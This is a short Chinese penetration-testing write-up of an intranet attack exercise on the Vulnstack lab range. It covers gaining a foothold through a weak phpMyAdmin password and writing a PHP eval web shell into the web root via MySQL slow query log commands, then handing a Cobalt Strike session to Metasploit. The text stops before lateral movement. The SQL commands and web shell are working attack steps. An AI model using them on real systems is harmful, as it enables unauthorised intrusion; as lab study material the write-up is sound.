内网渗透之小试牛刀
离你最近的地方,路途最远。
思路:
获取服务器权限->进入内网->判断是否在域中->信息收集(定位域控、域主机、域用户账号密码等)->横向移动(漏洞利用)->拿下域控。
获取权限:
靶场为http://vulnstack.qiyuanxuetang.net/vuln
直接开搞,首先判断yxcms,然后根据版本尝试一些漏洞无果,进而收集端口以及目录,发现phpmyadmin,弱口令进入
通过慢查询日志getshell
show variables like '%slow%';
set GLOBAL slow_query_log=on;
set global slow_query_log_file = 'c:/phpstudy/www/1.php';
select '<?php eval($_POST[cmd]);?>' from mysql.db where sleep(10);
即可获取shell:
准备工作:
由于菜刀不好用,直接反弹cs,
然后将cs传给msf,首先msf利用exploit/multi/handler监听,然后cs中把msf监听地址以及端口添加到listen并使用forgein进行监听,然后cs中spawn即可。